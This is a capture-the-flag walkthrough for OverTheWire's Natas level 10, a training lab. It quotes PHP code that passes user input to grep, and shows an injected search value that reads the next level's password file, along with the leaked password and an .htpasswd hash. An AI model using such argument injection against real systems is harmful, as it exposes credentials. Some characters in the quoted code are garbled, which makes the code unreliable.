Natas - Level 11

Connection information

• Username: natas10
• Password: nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
• URL: http://natas10.natas.labs.overthewire.org

Information given

The white box is composed of four parts:

1. The first part is a text displaying : ”For security reasons, we now filter on certain characters”
2. The second part is an input box with the label Find words containing:
3. The third is a button named Search
4. The last is a link View sourcecode pointing to http://natas10.natas.labs.overthewire.org/index-source.html

Getting the password

Output:
<pre>
  <?
    $key = ””;
    if(array key exists(”needle”, $ REQUEST)) {
      $key = $ REQUEST[”needle”];
    }
    if($key != ””) {
      if(preg match(’/[;|&]/’,$key)) {
        print ”Input contains an illegal character!”;
      } else {
        passthru(”grep −i $key dictionary.txt”);
      }
    }
  ?>
</pre>

As we can see we cannot use neither ”;” nor ”&” in our search from now on. No problem, we’ll just use grep to display everything in /etc/natas webpass/natas11.

We enter the following input:

.∗ /etc/natas webpass/natas11

Which displays:

.htaccess:AuthType Basic
.htaccess: AuthName ”Authentication required”
.htaccess: AuthUserFile /var/www/natas/natas10//.htpasswd
.htaccess: require valid−user
.htpasswd:natas10:$1$lakjx13m$ad/my0s9fiCraK3OrKhGc.
/etc/natas webpass/natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK